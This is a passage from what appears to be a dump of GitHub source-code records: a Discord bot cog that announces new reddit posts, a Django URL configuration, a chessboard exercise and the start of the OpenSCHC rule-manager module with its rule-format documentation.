SubWatch\n \"\"\"\n return self.state.channels[channel].queue.pop(0)\n\n def queue_length(self, channel: discord.Channel) -> int:\n \"\"\"\n Get the length of the a given channel's queue.\n :raise KeyError: Channel is not configured for SubWatch\n \"\"\"\n return len(self.state.channels[channel].queue)\n\n\nclass Subwatch(KazCog):\n \"\"\"!kazhelp\n category: Automation\n brief: Announce new reddit posts in a channel.\n description: |\n This module monitors one or more subreddits and announces new posts to Discord channels.\n\n It is configured to check every {{check_interval}}. 
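        Each watched channel keeps its own queue and last-posted time, so the same subreddit can feed several channels independently.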
It will post a maximum of\n {{max_posts_per_interval}} posts at a time every {{min_post_interval}}, to avoid flooding\n a Discord channel; otherwise, it will queue posts.\n contents:\n - subwatch\n - add\n - reset\n - rem\n \"\"\"\n cog_config: SubwatchConfig\n cog_state: SubwatchState\n\n #####\n # Lifecycle\n #####\n\n def __init__(self, bot):\n super().__init__(bot, 'subwatch', SubwatchConfig, SubwatchState)\n self.cog_config.set_defaults(\n reddit_username=None,\n check_interval=60,\n min_post_interval=300,\n max_posts_per_interval=2,\n )\n self.cog_state.set_defaults(\n channels=dict(),\n last_checked=utctimestamp(datetime.utcnow()),\n no_results_count=0\n )\n self.reddit = None # type: reddit.Reddit\n self.stream_manager = None # type: RedditStreamManager\n self.queue_manager = None # type: QueueManager\n\n async def on_ready(self):\n await super().on_ready()\n self.cog_state.set_cog(self)\n _ = self.cog_state.channels # convert and validate\n self.reddit = reddit.RedditLoginManager().get_reddit(self.cog_config.reddit_username)\n self.stream_manager = RedditStreamManager(self.reddit, self._get_all_subreddits())\n self.queue_manager = QueueManager(self.cog_state)\n\n logger.info(\"Using reddit account: {}\".format((await self.reddit.user.me()).name))\n\n if not self.scheduler.get_instances(self.task_check_reddit):\n delay = timedelta(seconds=15)\n interval = self.cog_config.check_interval\n self.scheduler.schedule_task_in(self.task_check_reddit, delay, every=interval)\n\n def export_kazhelp_vars(self):\n return {\n 'check_interval': format_timedelta(self.cog_config.check_interval),\n 'min_post_interval': format_timedelta(self.cog_config.min_post_interval),\n 'max_posts_per_interval': str(self.cog_config.max_posts_per_interval)\n }\n\n def unload_kazcog(self):\n self.scheduler.cancel_all(self.task_check_reddit)\n self.scheduler.cancel_all(self.task_process_queue)\n\n #####\n # Core\n #####\n\n @staticmethod\n def log_submission(submission: reddit.models.Submission) -> str:\n \"\"\" Format submission info in short form for logs. \"\"\"\n return \"{0.id} on {0.subreddit.display_name} (\\\"{1}\\\")\".format(\n submission, natural_truncate(submission.title, 50)\n )\n\n def _get_all_subreddits(self) -> Set[str]:\n \"\"\" Get the set of all subreddits being watched across all channels. \"\"\"\n subreddits = set()\n for channel, data in self.cog_state.channels.items():\n subreddits.update(data.subreddits)\n return subreddits\n\n async def _post_all_channels(self):\n for channel in self.cog_state.channels.keys():\n await self._post_from_queue(channel)\n\n def schedule_post_from_queue(self, channel: discord.Channel):\n \"\"\"\n If it's too early to post from the queue into this Discord channel, schedules it for later\n and return True. 
Otherwise, does nothing and return False.\n\n If a posting task for this channel is already scheduled for later, returns True.\n :param channel:\n :return: True if scheduled later, False if not (channel can post now)\n \"\"\"\n # check if already scheduled\n for task_instance in self.scheduler.get_instances(self.task_process_queue):\n if task_instance.args[0] == channel:\n return True\n\n ch_info = self.cog_state.channels[channel]\n next_post_time = ch_info.last_posted + self.cog_config.min_post_interval\n if ch_info.queue and datetime.utcnow() < next_post_time:\n logger.warning(\"Too early to post in #{}: scheduling for later.\".format(channel.name))\n self.scheduler.schedule_task_at(\n task=self.task_process_queue,\n dt=next_post_time,\n args=(channel,)\n )\n return True\n return False\n\n async def _post_from_queue(self, channel: discord.Channel):\n \"\"\"\n Post any queued messages in the channel. This respects the minimum interval between discord\n posts and maximum number of posts per interval configuration settings, and will schedule\n the :meth:`~.task_process_queue` for later if there are too many queued posts.\n\n :param channel: Channel to post in.\n \"\"\"\n # too early to post - do it later\n if self.schedule_post_from_queue(channel):\n return\n\n ch_info = self.cog_state.channels[channel]\n count = 0\n try:\n while count < self.cog_config.max_posts_per_interval:\n try:\n submission_id = self.queue_manager.pop(channel)\n submission = await self.stream_manager.get_submission(submission_id)\n except reddit.DeletedError as e:\n logger.warning(\"Skipping deleted or removed post: {}\"\n .format(self.log_submission(e.args[0])))\n continue\n\n try:\n await self._send_submission(channel, submission)\n except (AttributeError, TypeError, ValueError) as e:\n logger.exception(\"Error posting submission: {}\"\n .format(self.log_submission(submission)))\n await self.send_message(channel, \"Subwatch: Error posting post: {}\"\n .format(submission.id))\n await self.send_output(\"[ERROR] Subwatch: Error posting post in #{}: {}\"\n .format(channel.name, submission.id))\n continue\n count += 1\n except IndexError: # we don't have enough in queue to post; that's fine\n pass\n else: # we did post something\n ch_info.last_posted = datetime.utcnow()\n\n async def _send_submission(self,\n channel: discord.Channel,\n submission: reddit.models.Submission):\n \"\"\" Post a submission to a channel. 
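        The embed links the post title back to reddit, credits the author, puts flair/OC tags with the subreddit and domain in the footer, and attaches the thumbnail when the post has one.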
\"\"\"\n logger.info(\"Posting to #{}: {}\".format(channel.name, self.log_submission(submission)))\n tags = []\n if submission.link_flair_text:\n tags.append(f'[{submission.link_flair_text}]')\n if submission.is_original_content:\n tags.append('[OC]')\n subreddit = '/r/{0}'.format(submission.subreddit.display_name)\n\n desc_parts = [''.join(tags)]\n if submission.is_self:\n desc_parts.append(f'(self.{submission.subreddit.display_name})')\n else:\n desc_parts.append(f'({submission.domain})')\n desc_parts.append('on')\n desc_parts.append(subreddit)\n\n es = EmbedSplitter(\n auto_truncate=True,\n title=submission.title,\n url='https://reddit.com' + submission.permalink,\n timestamp=datetime.utcfromtimestamp(submission.created_utc)\n )\n es.set_footer(text=' '.join(desc_parts))\n es.set_author(name='/u/' + submission.author.name,\n url='https://reddit.com/u/{}'.format(submission.author.name))\n if submission.thumbnail.startswith('http://') or submission.thumbnail.startswith('https://'):\n es.set_thumbnail(url=submission.thumbnail)\n await self.send_message(channel, embed=es)\n\n #####\n # Discord\n #####\n\n @task(is_unique=True)\n async def task_check_reddit(self):\n \"\"\" Checks all subreddits configured. \"\"\"\n sub_set = self._get_all_subreddits()\n\n if not sub_set:\n return # none configured\n\n with self.cog_state as state:\n count = 0\n last_checked = utctimestamp(state.last_checked)\n last_timestamp = last_checked # last processed submission timestamp\n async for submission in self.stream_manager.stream():\n # if an old submission / already checked, skip it\n if self.stream_manager.is_fresh and submission.created_utc <= last_checked:\n continue\n self.queue_manager.add(submission)\n last_timestamp = submission.created_utc\n logger.debug(\"Found post: {}\".format(self.log_submission(submission)))\n count += 1\n if count > 0:\n logger.info(\"Found {} posts in subreddits: {}\".format(count, ', '.join(sub_set)))\n else:\n logger.debug(\"Found 0 posts in subreddits: {}\".format(', '.join(sub_set)))\n # issue #339: if an older post is un-removed and detected, we want to avoid\n # re-posting posts that came after that older post\n if last_timestamp > last_checked:\n state.last_checked = datetime.utcfromtimestamp(last_timestamp)\n await self._post_all_channels()\n\n @task(is_unique=False)\n async def task_process_queue(self, channel: discord.Channel):\n \"\"\" Checks queue of reddit posts to send to Discord channel and posts when possible. 
\"\"\"\n with self.cog_state:\n await self._post_from_queue(channel)\n\n @commands.group(invoke_without_command=True, pass_context=True, ignore_extra=False)\n @mod_only()\n async def subwatch(self, ctx: commands.Context):\n \"\"\"!kazhelp\n\n brief: Show Subwatch configuration.\n description: Show the current subwatch configuration.\n \"\"\"\n channel_strings = []\n for channel, ch_info in self.cog_state.channels.items():\n channel_strings.append(\"{}: {}\".format(\n channel.mention, ', '.join('/r/' + name for name in ch_info.subreddits)\n ))\n await self.send_message(ctx.message.channel, ctx.message.author.mention + '\\n' +\n (format_list(channel_strings) if channel_strings else 'No subwatch configured'))\n\n @subwatch.command(pass_context=True, ignore_extra=False)\n @mod_only()\n async def add(self, ctx: commands.Context, channel: discord.Channel=None, *,\n subreddits: str=None):\n \"\"\"!kazhelp\n\n brief: Add or edit a channel's sub watches.\n description: Add or change subreddits to watch and post into a channel.\n parameters:\n - name: channel\n type: string\n description: \"Discord channel to output the watched subreddits into.\"\n - name: subreddits\n type: string\n optional: True\n description: \"Subreddits to watch and post in the channel. Can be separated by commas,\n spaces or `+`.\"\n examples:\n - command: \".subwatch add #general askreddit askscience\"\n description: \"Watch the subreddits AskReddit and AskScience and post new posts to\n #general.\"\n \"\"\"\n # preprocess the list\n subs_list_raw = subreddits.replace(',', ' ').replace('+', ' ').split(' ')\n # strip elements, and filter empty elements due to extra whitespace\n subreddits_list = tuple(filter(lambda s: s, (s.strip().lower() for s in subs_list_raw)))\n with self.cog_state as state:\n state.channels[channel] = SubwatchChannel(\n subreddits=subreddits_list,\n last_posted=datetime.utcnow() # issue #340: don't process old posts on new config\n )\n self.stream_manager.subreddits = self._get_all_subreddits()\n logger.info(\"Set channel #{} for subwatch: {}\"\n .format(channel.name, ', '.join('/r/' + s for s in subreddits_list)))\n await self.send_message(ctx.message.channel, ctx.message.author.mention + ' ' +\n \"Set channel {} for subwatch: {}\"\n .format(channel.mention, ', '.join('/r/' + s for s in subreddits_list)))\n\n @subwatch.command(pass_context=True, ignore_extra=False)\n @mod_only()\n async def reset(self, ctx: commands.Context, channel: discord.Channel):\n \"\"\"!kazhelp\n\n brief: Reset a channel's subwatch queue , posting only new posts from now onwards.\n description: |\n Reset a channel's subwatch state, clearing the queue and \"last checked\" data.\n This will cause subwatch to ignore older posts and only post new posts from the time\n this command is issued onward.\n parameters:\n - name: channel\n type: string\n description: \"Discord channel to output the watched subreddits into.\"\n examples:\n - command: \".subwatch reset #general\"\n description: \"\"\n \"\"\"\n with self.cog_state as state:\n current = state.channels[channel]\n subreddits = current.subreddits\n state.channels[channel] = SubwatchChannel(\n subreddits=subreddits, last_posted=datetime.utcnow()\n )\n self.stream_manager.subreddits = self._get_all_subreddits()\n logger.info(\"Reset channel #{} subwatch: {}\"\n .format(channel.name, ', '.join('/r/' + s for s in subreddits)))\n await self.send_message(ctx.message.channel, ctx.message.author.mention + ' ' +\n \"Reset channel {} subwatch: {}\"\n .format(channel.mention, ', '.join('/r/' 
+ s for s in subreddits)))\n\n @subwatch.command(pass_context=True, ignore_extra=False)\n @mod_only()\n async def rem(self, ctx: commands.Context, channel: discord.Channel=None):\n \"\"\"!kazhelp\n\n brief: Remove subwatches from a channel.\n description: Stop watching subreddits in a channel.\n parameters:\n - name: channel\n type: string\n description: \"Discord channel.\"\n examples:\n - command: \".subwatch rem #general\"\n description: \"Stop watching subreddits in #general.\"\n \"\"\"\n try:\n with self.cog_state as state:\n del state.channels[channel]\n except IndexError:\n logger.warning(f'Cannot remove channel #{channel.name}: no subwatch for channel')\n await self.send_message(ctx.message.channel, ctx.message.author.mention + ' ' +\n f'Cannot remove channel {channel.mention}: no subwatch for channel')\n else:\n # clean up scheduled tasks\n for task_instance in self.scheduler.get_instances(self.task_process_queue):\n if task_instance.args[0] == channel:\n task_instance.cancel()\n self.stream_manager.subreddits = self._get_all_subreddits()\n logger.info(f'Removed subwatches in #{channel.name}.')\n await self.send_message(ctx.message.channel,\n ctx.message.author.mention + ' ' + f'Removed subwatches in {channel.mention}.')\n\n\ndef setup(bot):\n bot.add_cog(Subwatch(bot))\n","repo_name":"Worldbuilding/kaztron","sub_path":"kaztron/cog/reddit/subwatch.py","file_name":"subwatch.py","file_ext":"py","file_size_in_byte":23964,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"36410681934","text":"from django.contrib import admin\nfrom django.urls import include, path, re_path\nfrom djoser.views import TokenCreateView\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions\nfrom users.views import CustomTokenDestroyView\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api/\", include(\"products.urls\", namespace=\"products\")),\n path(\"api/\", include(\"core.urls\", namespace=\"core\")),\n re_path(\n r\"^api/(?P(v1|v2))/auth/token/login/?$\",\n TokenCreateView.as_view(),\n name=\"login\",\n ),\n re_path(\n r\"^api/(?P(v1|v2))/auth/token/logout/?$\",\n CustomTokenDestroyView.as_view(),\n name=\"logout\",\n ),\n]\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Lenta hackathon API\",\n default_version=\"v1\",\n description=\"Документация для бэкенд приложения.\",\n # terms_of_service=\"URL страницы с пользовательским соглашением\",\n contact=openapi.Contact(email=\"kubanez74@gmail.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns += [\n re_path(\n r\"^swagger(?P\\.json|\\.yaml)$\",\n schema_view.without_ui(cache_timeout=0),\n name=\"schema-json\",\n ),\n re_path(\n r\"^swagger/$\",\n schema_view.with_ui(\"swagger\", cache_timeout=0),\n name=\"schema-swagger-ui\",\n ),\n re_path(\n r\"^redoc/$\",\n schema_view.with_ui(\"redoc\", cache_timeout=0),\n name=\"schema-redoc\"\n ),\n]\n","repo_name":"kubanez-create/Lenta_TS_backend","sub_path":"foodcast/foodcast/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44182328712","text":"'''\r\nBoolean38 ◦ . Даны координаты двух различных полей шахматной доски x 1 ,\r\ny 1 , x 2 , y 2 (целые числа, лежащие в диапазоне 1–8). 
\r\n\r\nx1 = int(input(\"Enter x1: \"))\r\ny1 = int(input(\"Enter y1: \"))\r\n\r\nx2 = int(input(\"Enter x2: \"))\r\ny2 = int(input(\"Enter y2: \"))\r\n\r\nflag = True\r\n\r\ncolor1 = ''\r\ncolor2 = ''\r\n\r\nif (x1 % 2 == 0 and y1 % 2 != 0) or (x1 % 2 != 0 and y1 % 2 == 0):\r\n\tcolor1 = 'white'\r\nelse:\r\n\tcolor1 = 'black'\r\n\r\nif (x2 % 2 == 0 and y2 % 2 != 0) or (x2 % 2 != 0 and y2 % 2 == 0):\r\n\tcolor2 = 'white'\r\nelse:\r\n\tcolor2 = 'black'\r\n\r\nif color1 == color2:\r\n\tif (abs(x1 - x2)) == (abs(y1 - y2)):\r\n\t\tpass\r\n\telse:\r\n\t\tflag = False\r\nelse:\r\n\tflag = False\r\n\r\nprint(flag)","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"Boolean(40)/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"337545278","text":"\"\"\"\nThe Rule Manager manages the context(s) for a specific device or a set of devices.\nIt maintains the context database and ensures its consistency. The hierarchy is the\nfollowing:\n\n+ context_database\n\n + device_context\n\n + set_of_rules\n\n + rule_id/rule_id_length\n\n + rules\n\n + Fragmentation\n + Compression\n\n------------\nIntroduction\n------------\n\nThe context includes a set of rules shared by both ends.\nIdentical Rules are used on both ends. They can be simply\ncopied/pasted from one end to the other end, if both ends use the same format for describing them.\n\nThis document specifies the OpenSCHC rule data model, which is based on JSON.\n\n---------------\nRule definition\n---------------\n\nA rule is described as a JSON dictionary.\n\nA rule is identified by its RuleID.\n\nThe size of the RuleID representation can change from one rule to\nthe next. Therefore, the rule description includes a RuleIDLength that indicates the length of the RuleID, in bits.\n\nBoth fields are integer numbers::\n\n {\n \"RuleID\" : 12,\n \"RuleIDLength\" : 4\n # notice that RuleID 12 represented on 6 bits is different from RuleID 12 on 4 bits!\n }\n\nIn SCHC, rules are used either for compression or fragmentation. Therefore, one and only one of the two keywords \"fragmentation\" or \"compression\" must be specified, per rule.\n\nCompression Rules\n-----------------\n\nAs defined in the SCHC specification, compression rules are composed of Field Descriptions.\nThe order in which the Field Descriptions appear in the rule is significant (e.g. it defines the order in which the compression residues are sent), therefore a compression rule is represented as an array.\n\nThe Field Description is a dictionary containing the key+data pairs as defined in the SCHC specification:\n\n* **FID**: a string identifying the field of the protocol header that is being compressed. The value of this string is the one returned by the protocol analyzer when encountering said field. E.g. \"IPV6.VER\". <<< why is this not IP.VER instead? It seems to me that IPV6.VER will always be 6!>>>\n* **FL**: if the value is a number, that value expresses the length of the field, in bits. If the \\\nvalue is a string, it designates a function that can compute the field length. The functions currently defined are:\n\n * *var*: the field is of variable length. It will be determined at run time by the protocol analyzer. The length (expressed in bytes) will be transmitted as part of the compression residue. 
The encoding is described in the SCHC specification.\n * *tkl*: this function is specific to compressing the CoAP Token field. The length of the Token is determined at run time by the protocol analyzer by looking at the Token Length field of the CoAP header.\n\n* **FP**: an integer specifying the position in the header of the field this Field Description applies to. The default value is 1. For each recurrence of the same field in the header, the value is increased by 1.\n* **DI**: tells the direction to which this Field Description applies:\n\n * *Up*: only to uplink messages (i.e. from device to network)\n * *Dw*: only to downlink messages (i.e. from network to device)\n * *Bi*: to both directions\n\n* **TV**: specifies the Target Value. The value is a number, a string or an array of these types. The \"TV\" key can be omitted or its value set to null if there is no value to check, for instance together with the \"ignore\" MO. If the Target Value is an array, then the value null among the array elements indicates that \\\nthe Field Descriptor matches the case where the field is not present in the header being compressed.\n* **MO**: specifies the Matching Operator. It is a string that can take the following values:\n\n * *ignore*: the field must be present in the header, but the value is not checked.\n * *equal*: the field value must match the Target Value, in type and value. <<< do the protocols considered carry explicit type descriptions for their fields? >>>\n * *MSB*: the most significant bits of the Target Value are checked against the most significant bits of the field value. The number of bits to be checked is given by the \"MOa\" field.\n * *match-mapping*: with this MO, the Target Value must be an array. This MO matches when one element of the Target Value array matches the field, in type and value.\n\n* **MOa**: specifies, if applicable, an argument to the MO. This currently only applies to the \"MSB\" MO, where the argument specifies the length of the matching, in bits.\n* **CDA**: designates the Compression/Decompression Action. It is a string that can take the following values:\n\n * *not-sent*: the field value is not sent as a residue.\n * *value-sent*: the field value is sent in extenso in the residue.\n * *LSB*: the bits remaining after the MSB comparison are sent in the residue.\n * *mapping-sent*: the index of the matching element in the array is sent.\n * *compute*: the field is not sent in the residue and the receiver knows how to recover the value from other information. This is generally used for length and checksum.\n\n* **CDAa**: represents the argument of the CDA. Currently, no CDAa is defined.
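\n\nThe behaviour of the main MOs can be illustrated with a small Python sketch.\nThis is illustrative only, not the OpenSCHC implementation; the helper name\n*matches*, its signature and the example values are invented for this purpose::\n\n    def matches(fv, tv, fl, mo, moa=None):\n        # fv: field value, tv: Target Value, fl: field length in bits\n        if mo == \"ignore\":\n            return True                      # presence only, value not checked\n        if mo == \"equal\":\n            return fv == tv\n        if mo == \"MSB\":\n            # compare the moa most significant bits of the fl-bit field\n            return (fv >> (fl - moa)) == (tv >> (fl - moa))\n        if mo == \"match-mapping\":\n            return fv in tv                  # tv is an array of allowed values\n        raise ValueError(mo)\n\n    assert matches(0xF3, 0xF0, 8, \"MSB\", moa=4)      # 1111.... vs 1111....\n    assert not matches(0x73, 0xF0, 8, \"MSB\", moa=4)\n    assert matches(58, [6, 17, 58], 8, \"match-mapping\")\n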
\nA complete compression rule, for example::\n\n {\n \"ruleID\": 12,\n \"ruleLength\": 4,\n \"compression\": [\n {\"FID\": \"IPV6.VER\", \"FL\": 4, \"FP\": 1, \"DI\": \"Bi\", \"TV\": 6, \"MO\": \"equal\", \"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.TC\", \"FL\": 8, \"FP\": 1, \"DI\": \"Bi\", \"TV\": 0, \"MO\": \"equal\", \"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.FL\", \"FL\": 20,\"FP\": 1, \"DI\": \"Bi\", \"TV\": 0, \"MO\": \"ignore\",\"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.LEN\", \"FL\": 16,\"FP\": 1, \"DI\": \"Bi\", \"MO\": \"ignore\",\"CDA\": \"compute-length\"},\n {\"FID\": \"IPV6.NXT\", \"FL\": 8, \"FP\": 1, \"DI\": \"Bi\", \"TV\": 58, \"MO\": \"equal\", \"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.HOP_LMT\",\"FL\": 8,\"FP\": 1,\"DI\": \"Bi\",\"TV\": 255,\"MO\": \"ignore\",\"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.DEV_PREFIX\",\"FL\": 64,\"FP\": 1,\"DI\": \"Bi\",\"TV\": [\"2001:db8::/64\",\n \"fe80::/64\",\n \"2001:0420:c0dc:1002::/64\" ],\n \"MO\": \"match-mapping\",\"CDA\": \"mapping-sent\",\"SB\": 1},\n {\"FID\": \"IPV6.DEV_IID\",\"FL\": 64,\"FP\": 1,\"DI\": \"Bi\",\"TV\": \"::79\",\"MO\": \"equal\",\"CDA\": \"DEVIID\"},\n {\"FID\": \"IPV6.APP_PREFIX\",\"FL\": 64,\"FP\": 1,\"DI\": \"Bi\",\"TV\": [ \"2001:db8:1::/64\",\n \"fe80::/64\",\n \"2404:6800:4004:818::/64\" ],\n \"MO\": \"match-mapping\",\"CDA\": \"mapping-sent\", \"SB\": 2},\n {\"FID\": \"IPV6.APP_IID\",\"FL\": 64,\"FP\": 1,\"DI\": \"Bi\",\"TV\": \"::2004\",\"MO\": \"equal\",\"CDA\": \"not-sent\"},\n {\"FID\": \"ICMPV6.TYPE\",\"FL\": 8,\"FP\": 1,\"DI\": \"Bi\",\"TV\": 128,\"MO\": \"equal\",\"CDA\": \"not-sent\"},\n {\"FID\": \"ICMPV6.CODE\",\"FL\": 8,\"FP\": 1,\"DI\": \"Bi\",\"TV\": 0, \"MO\": \"equal\",\"CDA\": \"not-sent\"},\n {\"FID\": \"ICMPV6.CKSUM\",\"FL\": 16,\"FP\": 1,\"DI\": \"Bi\",\"TV\": 0,\"MO\": \"ignore\",\"CDA\": \"compute-checksum\"},\n {\"FID\": \"ICMPV6.IDENT\",\"FL\": 16,\"FP\": 1,\"DI\": \"Bi\",\"TV\": [],\"MO\": \"ignore\",\"CDA\": \"value-sent\"},\n {\"FID\": \"ICMPV6.SEQNB\",\"FL\": 16,\"FP\": 1,\"DI\": \"Bi\",\"TV\": [],\"MO\": \"ignore\",\"CDA\": \"value-sent\"}\n ]\n }\n\n\nFragmentation Rules\n-------------------\n\nFragmentation rules define how fragmentation and reassembly must be performed.\n\nThe keyword **Fragmentation** is followed by a dictionary containing the different parameters used.\nInside it, the keyword **FRMode** indicates which fragmentation mode is used (**NoAck**, **AckAlways**, **AckOnError**).\n**FRDirection** gives the direction of the fragmentation rule: **UP** means that data fragments are sent by the device,\n**DW** the opposite direction. This entry is mandatory.\nThen the keyword **FRModeProfile** gives the information needed to create the SCHC fragmentation header and mode profile:\n\n* **dtagSize** gives the size, in bits, of the DTag field. This keyword can be used by all the fragmentation modes.\n* **WSize** gives the size, in bits, of the Window field. If not present, the default value is 0 (no window) in \\\nNoAck and 1 in AckAlways. In AckOnError this field must be set to 1 or to a higher value.\n* **FCNSize** gives the size, in bits, of the FCN field. 
If not present, the default value is 1 for NoAck. \\\nFor AckAlways and AckOnError the value must be specified.\n* **ackBehavior**: on AckOnError, this keyword specifies when the fragmenter expects to receive a bitmap from the reassembler:\n\n * *afterAll1*: the bitmap (or RCS OK) is expected only after the reception of an All-1.\n * *afterAll0*: the bitmap may be expected after the transmission of the window's last fragment (All-0 or All-1).\n\n* **lastTileInAll1**: true to append the last tile to the All-1 message, false otherwise.\n* **tileSize** gives the size, in bits, of a tile.\n* **MICAlgorithm** gives the algorithm used to compute the MIC, by default **RCS_RFC8724** (a CRC32).\n* **MICWordSize** gives the size of the RCS word.\n* **maxRetry** indicates to the sender how many times a fragment or an ack request can be sent.\n* **timeout** indicates, in seconds, how long the sender waits between two retransmissions. The receiver can use it to compute the delay before aborting.\n\nFor instance::\n\n {\n \"RuleID\": 1,\n \"RuleLength\": 3,\n \"Fragmentation\" : {\n \"FRMode\": \"AckOnError\",\n \"FRDirection\": \"UP\",\n \"FRModeProfile\": {\n \"dtagSize\": 2,\n \"WSize\": 5,\n \"FCNSize\": 3,\n \"ackBehavior\": \"afterAll1\",\n \"tileSize\": 9,\n \"MICAlgorithm\": \"RCS_RFC8724\",\n \"MICWordSize\": 8,\n \"maxRetry\": 4,\n \"timeout\": 600,\n \"lastTileInAll1\": false\n }\n }\n }\n\n-------\nContext\n-------\n\nA context is associated with a specific device, which may be identified by a unique LPWAN\nidentifier, for instance a LoRaWAN devEUI.\n\nThe context also includes a set of rules. The rule description is defined [above](#rule-definition)::\n\n\n [\n {\n \"DeviceID\": 0x1234567890,\n \"SoR\" : [ ..... ]\n },\n {\n \"DeviceID\": 0xDEADBEEF,\n \"SoR\" : [ ..... ]\n },\n ...\n ]\n\nDeviceID is a numerical value that must be unique in the context. If the context is used on a device, the deviceID may be omitted or set to null. In the core network, the DeviceIDs must be specified.\n\nThe set of rules itself expands as shown below::\n\n [\n {\n \"RuleID\" : 12,\n \"RuleIDLength\" : 4,\n \"compression\": [\n {\n \"FID\": \"IPV6.VER\",\n \"FL\": 4,\n \"FP\": 1,\n \"DI\": \"Bi\",\n \"TV\": 6,\n \"MO\": \"equal\",\n \"CDA\": \"not-sent\"\n },\n {\n \"FID\": \"IPV6.DEV_PREFIX\",\n \"FL\": 64,\n \"FP\": 1,\n \"DI\": \"Bi\",\n \"TV\": [ \"2001:db8::/64\", \"fe80::/64\", \"2001:0420:c0dc:1002::/64\" ],\n \"MO\": \"match-mapping\",\n \"CDA\": \"mapping-sent\",\n },\n ]\n },\n {\n \"RuleID\" : 13,\n \"RuleIDLength\" : 4,\n \"fragmentation\" : ....\n },\n .....\n ]\n\n\n\nRemove\n------\n\nSuppresses a rule for a specific device <<< only one, or a set of rules? >>>. 
If no rule is specified, all rules for that device are removed from the context::\n\n RM.remove ({\"DeviceID\": 0x1234567, \"SoR\": {{\"ruleID\":12, \"ruleLength\":4}}})\n RM.remove ({\"DeviceID\": 0x1234567})\n\nFindRuleFromPacket\n------------------\n\nThis method returns a rule and a DeviceID that match a packet description given by the protocol analyzer.\n\nFindFragmentationRule (size)\n----------------------------\n\nReturns a fragmentation rule compatible with the packet size passed as parameter.\n\n\nFindRuleFromID\n--------------\n\nGiven the first bits received from the LPWAN, returns either a fragmentation or a compression rule.\n\n\n\"\"\"\n\nfrom operator import mod\nfrom gen_base_import import *\nfrom copy import deepcopy\nfrom gen_parameters import *\nfrom compr_core import *\nfrom compr_parser import *\nimport ipaddress\nimport warnings\n\nimport base64\nimport cbor2 as cbor\n\n\"\"\"\n.. module:: gen_rulemanager\n :platform: Python, Micropython\n :synopsis: This module is used to manage rules.\n\"\"\"\n\n# XXX to be checked whether they are needed.\nDEFAULT_FRAGMENT_RID = 1\nDEFAULT_L2_SIZE = 8\nDEFAULT_RECV_BUFSIZE = 512\nDEFAULT_TIMER_T1 = 5\nDEFAULT_TIMER_T2 = 10\nDEFAULT_TIMER_T3 = 10\nDEFAULT_TIMER_T4 = 12\nDEFAULT_TIMER_T5 = 14\n\n# CONTAINS DEFAULT AND USEFUL INFORMATION ON FIELDS\n\nclass IPv6address:\n addr = b''\n\nFIELD__DEFAULT_PROPERTY = {\n T_IPV6_VER : {\"FL\": 4, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_TC : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_FL : {\"FL\": 20, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_NXT : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_HOP_LMT : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_LEN : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_DEV_PREFIX : {\"FL\": 64, \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_IPV6_DEV_IID : {\"FL\": 64, \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_IPV6_APP_PREFIX : {\"FL\": 64, \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_IPV6_APP_IID : {\"FL\": 64, \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_UDP_DEV_PORT : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_UDP_APP_PORT : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_UDP_LEN : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_UDP_CKSUM : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_TYPE : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_CODE : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_CKSUM : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_IDENT : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_SEQNO : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_UNUSED : {\"FL\": 32, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_PAYLOAD : {\"FL\": \"var\", \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_COAP_VERSION : {\"FL\": 2, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_TYPE : {\"FL\": 2, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_TKL : {\"FL\": 4, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_CODE : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_MID : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_TOKEN : {\"FL\": \"tkl\", \"TYPE\": int, \"ALGO\": 